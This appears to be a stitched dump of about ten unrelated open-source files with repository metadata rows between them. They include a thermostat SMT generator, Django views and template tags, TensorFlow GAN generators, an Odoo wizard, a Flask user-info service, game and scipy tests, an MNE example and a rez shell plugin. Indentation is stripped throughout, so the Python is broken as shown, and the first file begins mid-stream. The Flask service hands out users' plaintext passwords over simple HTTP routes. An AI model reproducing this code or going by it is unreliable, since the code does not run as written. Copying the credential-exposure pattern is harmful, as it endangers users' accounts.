(declare-fun x2_{0}_0 () Real)
(declare-fun x2_{0}_t () Real)
"""
state_val[2] = """
(assert (<= -20 x2_{0}_0)) (assert (<= x2_{0}_0 100))
(assert (<= -20 x2_{0}_t)) (assert (<= x2_{0}_t 100))
"""
cont_cond[2] = ["""
(assert (or (and (= mode_2_{0} 2) (connect holder_{2} flow_4))
(and (= mode_2_{0} 1) (connect holder_{2} flow_5))))
(assert (not (and (connect holder_{2} flow_4) (connect holder_{2} flow_5))))"""]
jump_cond[2] = ["""
(assert (and (= x2_{1}_0 x2_{0}_t)))
(assert (or (and (<= x2_{0}_t 20) (= mode_2_{1} 2))
(and (> x2_{0}_t 20) (= mode_2_{1} 1))))"""]
################
# thermostat 3 #
################
flow_var[3] = """
(declare-fun x3 () Real)
"""
flow_dec[3] = """
(define-ode flow_6 ((= d/dt[x3] (* 0.03 (- 300 (+ (* (- 1 0.07) x3) (* 0.02 x1) (* 0.05 x2)))))))
(define-ode flow_7 ((= d/dt[x3] (* -0.03 (+ (* (- 1 0.07) x3) (* 0.02 x1) (* 0.05 x2))))))
"""
state_dec[3] = """
(declare-fun mode_3_{0} () Int)
(declare-fun x3_{0}_0 () Real)
(declare-fun x3_{0}_t () Real)
"""
state_val[3] = """
(assert (<= -20 x3_{0}_0)) (assert (<= x3_{0}_0 100))
(assert (<= -20 x3_{0}_t)) (assert (<= x3_{0}_t 100))
"""
cont_cond[3] = ["""
(assert (or (and (= mode_3_{0} 2) (connect holder_{3} flow_6))
(and (= mode_3_{0} 1) (connect holder_{3} flow_7))))
(assert (not (and (connect holder_{3} flow_6) (connect holder_{3} flow_7))))"""]
jump_cond[3] = ["""
(assert (and (= x3_{1}_0 x3_{0}_t)))
(assert (or (and (<= x3_{0}_t 20) (= mode_3_{1} 2))
(and (> x3_{0}_t 20) (= mode_3_{1} 1))))"""]
#############
# Init/Goal #
#############
init_cond = """
(assert (= tau_{0}_0 0))
(assert (= mode_1_{0} 2))
(assert (and (>= x1_{0}_0 (- 20 1)) (<= x1_{0}_0 (+ 20 1))))
(assert (= mode_2_{0} 2))
(assert (and (>= x2_{0}_0 (- 20 1)) (<= x2_{0}_0 (+ 20 1))))
(assert (= mode_3_{0} 2))
(assert (and (>= x3_{0}_0 (- 20 1)) (<= x3_{0}_0 (+ 20 1))))
"""
goal_cond = """
(assert (or (< x1_{0}_t (- 20 7)) (> x1_{0}_t (+ 20 7))))
(assert (or (< x2_{0}_t (- 20 7)) (> x2_{0}_t (+ 20 7))))
(assert (or (< x3_{0}_t (- 20 7)) (> x3_{0}_t (+ 20 7))))
"""
import sys
try:
bound = int(sys.argv[1])
except:
print("Usage:", sys.argv[0], "<Bound>")
else:
generate(bound, 1, [0,1,2,3], 4, init_cond, goal_cond)
| gpl-2.0 | 4,517,924,462,000,548,000 | 25.907514 | 98 | 0.441461 | false |
allianceauth/allianceauth | allianceauth/thirdparty/navhelper/templatetags/navactive.py | 5 | 2726 | """
The MIT License (MIT)
Copyright (c) 2013 Guillaume Luchet
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
from django.template import Library
from django.urls import resolve
from django.conf import settings
import re
register = Library()
@register.simple_tag
def renavactive(request, pattern):
"""
{% renavactive request "^/a_regex" %}
"""
if re.search(pattern, request.path):
return getattr(settings, "NAVHELPER_ACTIVE_CLASS", "active")
return getattr(settings, "NAVHELPER_NOT_ACTIVE_CLASS", "")
@register.simple_tag
def navactive(request, urls):
"""
{% navactive request "view_name another_view_name" %}
"""
url_list = set(urls.split())
resolved = resolve(request.path)
resolved_urls = set()
if resolved.url_name:
resolved_urls.add(resolved.url_name)
if resolved.namespaces:
resolved_urls = resolved_urls.union(["{}:{}".format(namespace, resolved.url_name) for namespace in resolved.namespaces])
resolved_urls = resolved_urls.union(["{}:".format(namespace) for namespace in resolved.namespaces])
if getattr(resolved, 'app_name', None):
resolved_urls = resolved_urls.union(["{}:{}".format(resolved.app_name, resolved.url_name), "{}:".format(resolved.app_name)])
if getattr(resolved, 'app_names', []):
resolved_urls = resolved_urls.union(["{}:{}".format(app_name, resolved.url_name) for app_name in resolved.app_names])
resolved_urls = resolved_urls.union(["{}:".format(app_name) for app_name in resolved.app_names])
if url_list and resolved_urls and bool(resolved_urls & url_list):
return getattr(settings, "NAVHELPER_ACTIVE_CLASS", "active")
return getattr(settings, "NAVHELPER_NOT_ACTIVE_CLASS", "")
| gpl-2.0 | -3,972,329,846,212,784,600 | 42.269841 | 132 | 0.724872 | false |
shrtCKT/simple-dnn | simple_dnn/generative/generator.py | 1 | 5736 | """ The generator network of a GAN.
"""
import tensorflow as tf
import tensorflow.contrib.slim as slim
class GeneratorDC(object):
""" Deep Convolutional Generator.
"""
def __init__(self, x_dims, x_ch, g_conv_units,
g_kernel_sizes=[5,5], g_strides=[2, 2], g_paddings='SAME',
g_activation_fn=tf.nn.relu):
"""
DCGAN Generator network.
:param x_dims: 2d list [width, height]; the x dimentions.
:param x_ch: int; the channels in x.
:param g_conv_units: a list; the number of channels in each conv layer.
:param g_kernel_sizes: A list of length 2 [kernel_height, kernel_width], for all the conv layer filters.
Or a list of list, each list of size if size of the filter per cov layer.
:param g_strides: a list of tuples, each tuple holds the number stride of each conv layer.
or 2d list in which case all the conv layers will have the same stride.
:param g_paddings: string or list of strings, specifying the padding type.
:param g_activation_fn: a single or a list of activations functions.
"""
# Data Config
self.x_dims = x_dims
self.x_ch = x_ch
######################## Generator
self.g_conv_units = g_conv_units
if isinstance(g_kernel_sizes[0], list) or isinstance(g_kernel_sizes[0], tuple):
assert len(g_conv_units) == len(g_kernel_sizes)
self.g_kernel_sizes = g_kernel_sizes
else:
self.g_kernel_sizes = [g_kernel_sizes] * len(g_conv_units)
if isinstance(g_strides[0], list) or isinstance(g_strides[0], tuple):
assert len(g_conv_units) == len(g_strides)
self.g_strides = g_strides
else:
self.g_strides = [g_strides] * len(g_conv_units)
if isinstance(g_paddings, list):
assert len(g_conv_units) == len(g_paddings)
self.g_paddings = g_paddings
else:
self.g_paddings = [g_paddings] * len(g_conv_units)
self.g_activation_fn = g_activation_fn
def __call__(self, z, ys=None):
if ys is None:
z_concat = z
else:
z_concat = tf.concat([z, ys], axis=1)
zP = slim.fully_connected(
z_concat, 4*4*256, normalizer_fn=slim.batch_norm,
activation_fn=tf.nn.relu,scope='g_project',
weights_initializer=tf.truncated_normal_initializer(stddev=0.01))
zCon = tf.reshape(zP,[-1,4,4,256])
net = zCon
with slim.arg_scope([slim.conv2d_transpose],
weights_initializer=tf.truncated_normal_initializer(stddev=0.02),
normalizer_fn=slim.batch_norm,
activation_fn=self.g_activation_fn):
for i, (g_unit, kernel_size, stride, padding) in enumerate(zip(
self.g_conv_units, self.g_kernel_sizes, self.g_strides, self.g_paddings)):
net = slim.conv2d_transpose(net, num_outputs=g_unit, kernel_size=kernel_size,
stride=stride, padding=padding, scope='g_conv{0}'.format(i))
g_out = slim.convolution2d_transpose(
net,num_outputs=self.x_ch, kernel_size=self.x_dims, padding="SAME",
biases_initializer=None,activation_fn=tf.nn.tanh,
scope='g_out', weights_initializer=tf.truncated_normal_initializer(stddev=0.02))
return g_out
class GeneratorFlat(object):
""" Fully Connected Conditional Generator.
"""
def __init__(self, x_dims, x_ch, hidden_units,
g_activation_fn=tf.nn.relu,
batch_norm=True):
"""
Fully Connected Conditional Generator network.
:param x_dims: a list of any size > 0; the x dimentions.
:param x_ch: int; the channels in x.
:param hidden_units: a list; the number of channels in each conv layer.
:param g_activation_fn: an function.
:param batch_norm: if True, enable batch normalization.
"""
# Data Config
if isinstance(x_dims, list) or isinstance(x_dims, tuple):
self.x_dims = x_dims
else:
self.x_dims = [x_dims]
self.x_ch = x_ch
self.batch_norm = batch_norm
self.hidden_units = hidden_units
if not isinstance(g_activation_fn, list) and self.hidden_units is not None:
self.g_activation_fn = [g_activation_fn] * len(self.hidden_units)
else:
self.g_activation_fn = g_activation_fn
def __call__(self, z, ys=None):
if ys is None:
net = z
else:
net = tf.concat([z, ys], axis=1)
with slim.arg_scope([slim.fully_connected],
weights_initializer=tf.truncated_normal_initializer(stddev=0.02),
normalizer_fn=slim.batch_norm if self.batch_norm else None):
for i, (h_unit, activation_fn) in enumerate(zip(self.hidden_units, self.g_activation_fn)):
net = slim.fully_connected(net, h_unit, activation_fn=activation_fn,
scope='g_full{0}'.format(i))
out_units = 1
for dim in self.x_dims:
out_units *= dim
out_units *= self.x_ch
g_out = slim.fully_connected(net, out_units, scope='g_out',
activation_fn=tf.nn.tanh,
biases_initializer=None,
weights_initializer=tf.truncated_normal_initializer(stddev=0.02))
return g_out | gpl-3.0 | -7,486,515,944,308,775,000 | 40.273381 | 112 | 0.55666 | false |
Yellowen/vanda | vanda/auth/views.py | 1 | 6259 | # -----------------------------------------------------------------------------
# Vanda - Web development platform
# Copyright (C) 2011 Some Hackers In Town
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
# -----------------------------------------------------------------------------
from django.shortcuts import render_to_response as rr
from django.template import RequestContext
from django.contrib.auth.models import User
from django.db import transaction
from django.http import (Http404, HttpResponseForbidden,
HttpResponseRedirect)
from django.utils.translation import ugettext as _
from django.contrib.auth import login, authenticate
from django.contrib.auth.models import User
from django.core.urlresolvers import reverse
from django.contrib.auth.decorators import login_required
from forms import PreRegistrationForm, PostRegistrationForm
from mail import VerificationMail
from models import Verification
def pre_register(request):
"""
First step of registeration process. In this step we process
just username and email address and send a verification mail.
"""
if request.method == "POST":
form = PreRegistrationForm(request.POST)
if form.is_valid():
data = form.cleaned_data
# collect queries in a single transaction
with transaction.commit_on_success():
email = User.objects.filter(email=data["email"])
user = User.objects.filter(username=data["username"])
if email or user:
# returning suitable error if email or user already registered
if email:
form.errors["email"] = (
_("This Email already registered."), )
if user:
form.errors["usernmae"] = (
_("This Username already registered."), )
return rr("pre_registeration.html",
{"form": form},
context_instance=RequestContext(request))
else:
# Create a user and send the verification mail
user = User(username=data["username"], email=data["email"],
is_active=False)
user.save()
# create verification code and save it in DB
verification_code = Verification(user=user)
code = verification_code.create_verification_code()
vmail = VerificationMail(user, code, request.META["HTTP_HOST"])
vmail.send()
return rr("verification_sent.html")
else:
return rr("pre_registeration.html",
{"form": form},
context_instance=RequestContext(request))
else:
form = PreRegistrationForm()
return rr("pre_registeration.html",
{"form": form},
context_instance=RequestContext(request))
def post_register(request):
"""
Complete the registeration by asking user to fill extra information.
"""
user = None
if "user" in request.session:
user = request.session["user"]
else:
return HttpResponseForbidden()
if request.method == "POST":
form = PostRegistrationForm(request.POST)
if form.is_valid():
try:
form.save(user)
except form.PasswordError, e:
form.errors["password1"] = unicode(e)
form.errors["password2"] = unicode(e)
return rr("post_registeration.html",
{"form": form},
context_instance=RequestContext(request))
user = authenticate(username=user.username,
password=form.cleaned_data["password1"])
login(request, user)
return HttpResponseRedirect(reverse("auth.views.profile",
args=[]))
else:
return rr("post_registeration.html",
{"form": form},
context_instance=RequestContext(request))
else:
form = PostRegistrationForm()
return rr("post_registeration.html",
{"form": form},
context_instance=RequestContext(request))
@login_required
def profile(request):
"""
User profile main view.
"""
pass
def ajax_js(request):
"""
Return a suitable javascript code for given url.
"""
url = request.GET.get("validator", None)
if url:
return rr("validator.js", {"url": url})
else:
raise Http404()
def verificate_email(request, code):
"""
Get the verification code and verify the user mail.
"""
# Look for given verification code
try:
verification = Verification.objects.get(code=code)
except Verification.DoesNotExist:
# always riase a 404 status code for invalid code
raise Http404()
# if verification code sent ins last 48 hours
if verification.is_valid():
# Activating user
user = verification.user
user.is_active = True
user.save()
request.session["user"] = user
verification.delete()
form = PostRegistrationForm()
return rr("post_registeration.html",
{"form": form},
context_instance=RequestContext(request))
else:
# If code expired.
verification.delete()
raise Http404()
| gpl-2.0 | 67,268,331,838,765,720 | 34.361582 | 79 | 0.579006 | false |
akretion/odoo | addons/stock/wizard/stock_rules_report.py | 13 | 2224 | # -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from odoo import api, fields, models
class StockRulesReport(models.TransientModel):
_name = 'stock.rules.report'
_description = 'Stock Rules report'
product_id = fields.Many2one('product.product', string='Product', required=True)
product_tmpl_id = fields.Many2one('product.template', String='Product Template', required=True)
warehouse_ids = fields.Many2many('stock.warehouse', string='Warehouses', required=True,
help="Show the routes that apply on selected warehouses.")
product_has_variants = fields.Boolean('Has variants', default=False, required=True)
@api.model
def default_get(self, fields):
res = super(StockRulesReport, self).default_get(fields)
product_tmpl_id = False
if 'product_id' in fields:
if self.env.context.get('default_product_id'):
product_id = self.env['product.product'].browse(self.env.context['default_product_id'])
product_tmpl_id = product_id.product_tmpl_id
res['product_tmpl_id'] = product_id.product_tmpl_id.id
res['product_id'] = product_id.id
elif self.env.context.get('default_product_tmpl_id'):
product_tmpl_id = self.env['product.template'].browse(self.env.context['default_product_tmpl_id'])
res['product_tmpl_id'] = product_tmpl_id.id
res['product_id'] = product_tmpl_id.product_variant_id.id
if len(product_tmpl_id.product_variant_ids) > 1:
res['product_has_variants'] = True
if 'warehouse_ids' in fields:
warehouse_id = self.env['stock.warehouse'].search([], limit=1).id
res['warehouse_ids'] = [(6, 0, [warehouse_id])]
return res
def _prepare_report_data(self):
data = {
'product_id': self.product_id.id,
'warehouse_ids': self.warehouse_ids.ids,
}
return data
def print_report(self):
self.ensure_one()
data = self._prepare_report_data()
return self.env.ref('stock.action_report_stock_rule').report_action(None, data=data)
| agpl-3.0 | 5,978,778,199,090,360,000 | 44.387755 | 114 | 0.623201 | false |
LabAdvComp/tukey_middleware | tukey_middleware/modules/instance_metadata/user_info.py | 1 | 3366 | # Copyright 2013 Open Cloud Consortium
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import flask
import json
import requests
from flask import request, g
from keystoneclient.v2_0 import client
from tukey_middleware import local_settings
from tukey_middleware.auth.base import TukeyAuthException
from tukey_middleware.flask_utils import with_user, return_error
rest = flask.Blueprint('v0', __name__)
settings = local_settings.vm_ip_auth
@rest.route('/')
def default_info():
'''
Return JSON packed with all of the user's info:
username, password, identifiers.
'''
return get_info(cloud_name=settings["default"])
@rest.route('/cloud')
def get_cloud():
''' return the default cloud'''
return settings["default"]
@rest.route('/<cloud_name>/')
@return_error
@with_user(rest, use_cloud_name=True)
def get_info(cloud_name):
''' return all of the user info '''
try:
password = g.user.password()
identifiers = g.user.identifiers()
except TukeyAuthException:
password = ""
identifiers = []
return json.dumps({
"username": g.user.username(),
"tenant_name": g.user.tenant_name(),
"password": password,
"identifiers": identifiers,
"cloud_name": cloud_name
})
@rest.route('/password')
def default_password():
'''
Return the user's samba/OpenStack password.
If there is no cloud specified look in the settings file for a default.
This allows the OSDC init-cloud.sh to be the same across clouds
'''
return get_password(cloud_name=settings["default"])
@rest.route('/username')
def default_username():
return get_username(cloud_name=settings["default"])
@rest.route('/identifiers')
def default_identifiers():
return get_identifiers(cloud_name=settings["default"])
@rest.route('/tenant_name')
def default_tenant_name():
return get_tenant_name(cloud_name=settings["default"])
@rest.route('/<cloud_name>/password')
@return_error
@with_user(rest, use_cloud_name=True)
def get_password(cloud_name=None):
''' return the users openstack/samba password '''
return g.user.password() if g.user.password() is not None else ""
@rest.route('/<cloud_name>/username')
@return_error
@with_user(rest, use_cloud_name=True)
def get_username(cloud_name=None):
''' return the username '''
return g.user.username() if g.user.username() is not None else ""
@rest.route('/<cloud_name>/identifiers')
@return_error
@with_user(rest, use_cloud_name=True)
def get_identifiers(cloud_name=None):
''' return single sign on indentifiers '''
return json.dumps(g.user.identifiers())
@rest.route('/<cloud_name>/tenant_name')
@return_error
@with_user(rest, use_cloud_name=True)
def get_tenant_name(cloud_name=None):
''' return the tenant name '''
return g.user.tenant_name()
| apache-2.0 | 4,318,000,108,861,852,700 | 26.365854 | 76 | 0.690434 | false |
hemmerling/python-coursera2012 | src/week8/week8_test.py | 1 | 7877 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
# @package coursera2012
# @author Rolf Hemmerling <[email protected]>
# @version 1.00
# @date 2015-01-01
# @copyright Apache License, Version 2.0
#
# Implementation of the game
# "Asteroids"
# for the Coursera course
# "An Introduction to Interactive Programming in Python"
#
# Copyright 2012-2015 Rolf Hemmerling
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
# import modules
import unittest
from simplegui import Canvas
from asteroids import ImageInfo
from asteroids import Ship
from asteroids import Sprite
from asteroids import AsteroidsGame
#from asteroids import ship_image
ship_image = None
class ImageInfo_getCenterTest(unittest.TestCase):
def setUp(self):
"""Call before every test case."""
center = [1,1]
size = 1
self.imageinfo = ImageInfo(center, size)
def testGetCenter(self):
center = [1,1]
self.imageinfo.center = center
assert self.imageinfo.get_center() == center, 'ImageInfo.get_center() does not provide the right return value'
class ImageInfo_getSizeTest(unittest.TestCase):
def setUp(self):
"""Call before every test case."""
center = [1,1]
size = 1
self.imageinfo = ImageInfo(center, size)
def testGetSize(self):
size = 1
self.imageinfo.size = size
assert self.imageinfo.get_size() == size, 'ImageInfo.get_size() does not provide the right return value'
class ImageInfo_getRadiusTest(unittest.TestCase):
def setUp(self):
"""Call before every test case."""
center = [1,1]
size = 1
self.imageinfo = ImageInfo(center, size)
def testGetRadius(self):
radius = 1
self.imageinfo.radius = radius
assert self.imageinfo.get_radius() == radius, 'ImageInfo.get_radius() does not provide the right return value'
class ImageInfo_getLifespanTest(unittest.TestCase):
def setUp(self):
"""Call before every test case."""
center = [1,1]
size = 1
self.imageinfo = ImageInfo(center, size)
def testGetLifespan(self):
lifespan = 1
self.imageinfo.lifespan = lifespan
assert self.imageinfo.get_lifespan() == lifespan, 'ImageInfo.get_radius() does not provide the right return value'
class ImageInfo_getAnimatedTest(unittest.TestCase):
def setUp(self):
"""Call before every test case."""
center = [1,1]
size = 1
self.imageinfo = ImageInfo(center, size)
def testGetAnimated(self):
animated = False
self.imageinfo.lifespan = animated
assert self.imageinfo.get_animated() == animated, 'ImageInfo.get_animated() does not provide the right return value'
class Ship_drawTest(unittest.TestCase):
def setUp(self):
"""Call before every test case."""
global ship_image
self.asteroids = AsteroidsGame()
self.asteroids.init()
pos = [1,1]
vel = [1,1]
angle = 0
image = ship_image
center = [1,1]
size = 1
info = ImageInfo(center, size)
self.ship = Ship( pos, vel, angle, image, info)
def testDraw(self):
canvas = Canvas()
self.ship.pos = [1,1]
self.ship.radius = 0
assert self.ship.draw(canvas) == None, 'Ship.draw() does not provide the right return value'
class Ship_updateTest(unittest.TestCase):
def setUp(self):
"""Call before every test case."""
global ship_image
self.asteroids = AsteroidsGame()
self.asteroids.init()
pos = [1,1]
vel = [1,1]
angle = 0
image = ship_image
center = [1,1]
size = 1
info = ImageInfo(center, size)
self.ship = Ship( pos, vel, angle, image, info)
def testUpdate(self):
assert self.ship.update() == None, 'Ship.draw() does not provide the right return value'
class Sprite_drawTest(unittest.TestCase):
def setUp(self):
"""Call before every test case."""
pos =[0,0]
vel = [0,0]
ang = 0.0
ang_vel= [0,0]
image = None
center = [1,1]
size = 1
info = ImageInfo(center, size)
self.sprite = Sprite(pos, vel, ang, ang_vel, image, info)
def testDraw(self):
canvas = Canvas()
assert self.sprite.draw(canvas) == None, 'Sprite.draw() does not provide the right return value'
class Sprite_updateTest(unittest.TestCase):
def setUp(self):
"""Call before every test case."""
pos =[0,0]
vel = [0,0]
ang = 0.0
ang_vel= [0,0]
image = None
center = [1,1]
size = 1
info = ImageInfo(center, size)
self.sprite = Sprite(pos, vel, ang, ang_vel, image, info)
def testUpdate(self):
assert self.sprite.update() == None, 'Sprite.update() does not provide the right return value'
class AsteroidsGame_initTest(unittest.TestCase):
def setUp(self):
"""Call before every test case."""
self.asteroids = AsteroidsGame()
def testInit(self):
assert self.asteroids.init() == None, 'AsteroidsGame.init() does not provide the right return value'
class AsteroidsGame_angleToVectorTest(unittest.TestCase):
def setUp(self):
"""Call before every test case."""
self.asteroids = AsteroidsGame()
def testAngle_ToVector(self):
vector = [1, 0]
assert self.spaceship.angle_to_vector(0) == vector, 'AsteroidsGame.angle_to_vector() does not provide the right return value'
class AsteroidsGame_distTest(unittest.TestCase):
def setUp(self):
"""Call before every test case."""
self.asteroids = AsteroidsGame()
def testDist(self):
a = [0, 1]
b = [0, 0]
dist = 1
assert self.asteroids.dist(a,b) == dist, 'AsteroidsGame.init() does not provide the right return value'
class AsteroidsGame_drawTest(unittest.TestCase):
def setUp(self):
"""Call before every test case."""
self.asteroids = AsteroidsGame()
self.asteroids.init()
def testDraw(self):
canvas = Canvas()
assert self.asteroids.draw(canvas) == None, 'AsteroidsGame.draw() does not provide the right return value'
class AsteroidsGame_rockSpawnerTest(unittest.TestCase):
def setUp(self):
"""Call before every test case."""
self.asteroids = AsteroidsGame()
def testRockSpawner(self):
assert self.asteroids.rock_spawner() == None, 'AsteroidsGame.rock_spawner() does not provide the right return value'
class AsteroidsGame_mainTest(unittest.TestCase):
def setUp(self):
"""Call before every test case."""
self.asteroids = AsteroidsGame()
def testMain(self):
assert self.asteroids.main() == None, 'AsteroidsGame.main() does not provide the right return value'
# run all tests
if __name__ == "__main__":
try:
unittest.main()
except SystemExit as inst:
if inst.args[0] is True: # raised by sys.exit(True) when tests failed
raise
| apache-2.0 | 4,969,938,699,966,351,000 | 28.296154 | 133 | 0.610258 | false |
person142/scipy | scipy/ndimage/tests/test_regression.py | 5 | 1286 | import numpy as np
from numpy.testing import assert_array_almost_equal
import scipy.ndimage as ndimage
def test_byte_order_median():
"""Regression test for #413: median_filter does not handle bytes orders."""
a = np.arange(9, dtype='<f4').reshape(3, 3)
ref = ndimage.filters.median_filter(a,(3, 3))
b = np.arange(9, dtype='>f4').reshape(3, 3)
t = ndimage.filters.median_filter(b, (3, 3))
assert_array_almost_equal(ref, t)
def test_zoom_output_shape():
"""Ticket #643"""
x = np.arange(12).reshape((3,4))
ndimage.zoom(x, 2, output=np.zeros((6,8)))
def test_ticket_742():
def SE(img, thresh=.7, size=4):
mask = img > thresh
rank = len(mask.shape)
la, co = ndimage.label(mask,
ndimage.generate_binary_structure(rank, rank))
_ = ndimage.find_objects(la)
if np.dtype(np.intp) != np.dtype('i'):
shape = (3,1240,1240)
a = np.random.rand(np.prod(shape)).reshape(shape)
# shouldn't crash
SE(a)
def test_gh_issue_3025():
"""Github issue #3025 - improper merging of labels"""
d = np.zeros((60,320))
d[:,:257] = 1
d[:,260:] = 1
d[36,257] = 1
d[35,258] = 1
d[35,259] = 1
assert ndimage.label(d, np.ones((3,3)))[1] == 1
| bsd-3-clause | 2,966,640,725,355,072,500 | 27.577778 | 79 | 0.578538 | false |
mne-tools/mne-tools.github.io | 0.14/_downloads/plot_evoked_delayed_ssp.py | 22 | 3873 | """
=========================================
Create evoked objects in delayed SSP mode
=========================================
This script shows how to apply SSP projectors delayed, that is,
at the evoked stage. This is particularly useful to support decisions
related to the trade-off between denoising and preserving signal.
We first will extract Epochs and create evoked objects
with the required settings for delayed SSP application.
Then we will explore the impact of the particular SSP projectors
on the evoked data.
"""
# Authors: Alexandre Gramfort <[email protected]>
# Denis Engemann <[email protected]>
#
# License: BSD (3-clause)
import matplotlib.pyplot as plt
import mne
from mne import io
from mne.datasets import sample
print(__doc__)
data_path = sample.data_path()
###############################################################################
# Set parameters
raw_fname = data_path + '/MEG/sample/sample_audvis_filt-0-40_raw.fif'
event_fname = data_path + '/MEG/sample/sample_audvis_filt-0-40_raw-eve.fif'
event_id, tmin, tmax = 1, -0.2, 0.5
# Setup for reading the raw data
raw = io.Raw(raw_fname, preload=True)
raw.filter(1, 40, method='iir')
events = mne.read_events(event_fname)
# pick magnetometer channels
picks = mne.pick_types(raw.info, meg='mag', stim=False, eog=True,
include=[], exclude='bads')
# If we suspend SSP projection at the epochs stage we might reject
# more epochs than necessary. To deal with this we set proj to `delayed`
# while passing reject parameters. Each epoch will then be projected before
# performing peak-to-peak amplitude rejection. If it survives the rejection
# procedure the unprojected raw epoch will be employed instead.
# As a consequence, the point in time at which the projection is applied will
# not have impact on the final results.
# We will make use of this function to prepare for interactively selecting
# projections at the evoked stage.
epochs = mne.Epochs(raw, events, event_id, tmin, tmax, picks=picks,
baseline=None, reject=dict(mag=4e-12),
proj='delayed')
evoked = epochs.average() # average epochs and get an Evoked dataset.
###############################################################################
# Interactively select / deselect the SSP projection vectors
# Here we expose the details of how to apply SSPs reversibly
title = 'Incremental SSP application'
# let's first move the proj list to another location
projs, evoked.info['projs'] = evoked.info['projs'], []
fig, axes = plt.subplots(2, 2) # create 4 subplots for our four vectors
# As the bulk of projectors was extracted from the same source, we can simply
# iterate over our collection of projs and add them step by step to see how
# the signals change as a function of the SSPs applied. As this operation
# can't be undone we will operate on copies of the original evoked object to
# keep things reversible.
for proj, ax in zip(projs, axes.flatten()):
evoked.add_proj(proj) # add projection vectors loop by loop.
evoked.copy().apply_proj().plot(axes=ax) # apply on a copy of evoked
ax.set_title('+ %s' % proj['desc']) # extract description.
plt.suptitle(title)
mne.viz.tight_layout()
# We also could have easily visualized the impact of single projection vectors
# by deleting the vector directly after visualizing the changes.
# E.g. had we appended the following line to our loop:
# `evoked.del_proj(-1)`
# Often, it is desirable to interactively explore data. To make this more
# convenient we can make use of the 'interactive' option. This will open a
# check box that allows us to reversibly select projection vectors. Any
# modification of the selection will immediately cause the figure to update.
evoked.plot(proj='interactive')
# Hint: the same works with evoked.plot_topomap
| bsd-3-clause | 9,072,494,202,869,819,000 | 39.768421 | 79 | 0.695068 | false |
LumaPictures/rez | src/rezplugins/shell/cmd.py | 3 | 8202 | """
Windows Command Prompt (DOS) shell.
"""
from rez.config import config
from rez.rex import RexExecutor, literal
from rez.shells import Shell
from rez.system import system
from rez.utils.platform_ import platform_
from rez.util import shlex_join
import os
import re
import subprocess
class CMD(Shell):
# For reference, the ss64 web page provides useful documentation on builtin
# commands for the Windows Command Prompt (cmd). It can be found here :
# http://ss64.com/nt/cmd.html
syspaths = None
_executable = None
@property
def executable(cls):
if cls._executable is None:
cls._executable = Shell.find_executable('cmd')
return cls._executable
@classmethod
def name(cls):
return 'cmd'
@classmethod
def file_extension(cls):
return 'bat'
@classmethod
def startup_capabilities(cls, rcfile=False, norc=False, stdin=False,
command=False):
cls._unsupported_option('rcfile', rcfile)
rcfile = False
cls._unsupported_option('norc', norc)
norc = False
cls._unsupported_option('stdin', stdin)
stdin = False
return (rcfile, norc, stdin, command)
@classmethod
def get_startup_sequence(cls, rcfile, norc, stdin, command):
rcfile, norc, stdin, command = \
cls.startup_capabilities(rcfile, norc, stdin, command)
return dict(
stdin=stdin,
command=command,
do_rcfile=False,
envvar=None,
files=[],
bind_files=[],
source_bind_files=(not norc)
)
@classmethod
def get_syspaths(cls):
if not cls.syspaths:
paths = []
cmd = ["REG", "QUERY", "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment", "/v", "PATH"]
expected = "\r\nHKEY_LOCAL_MACHINE\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\Session Manager\\\\Environment\r\n PATH REG_(EXPAND_)?SZ (.*)\r\n\r\n"
p = subprocess.Popen(cmd, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, shell=True)
out_, _ = p.communicate()
if p.returncode == 0:
match = re.match(expected, out_)
if match:
paths.extend(match.group(2).split(os.pathsep))
cmd = ["REG", "QUERY", "HKCU\\Environment", "/v", "PATH"]
expected = "\r\nHKEY_CURRENT_USER\\\\Environment\r\n PATH REG_(EXPAND_)?SZ (.*)\r\n\r\n"
p = subprocess.Popen(cmd, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, shell=True)
out_, _ = p.communicate()
if p.returncode == 0:
match = re.match(expected, out_)
if match:
paths.extend(match.group(2).split(os.pathsep))
cls.syspaths = set([x for x in paths if x])
return cls.syspaths
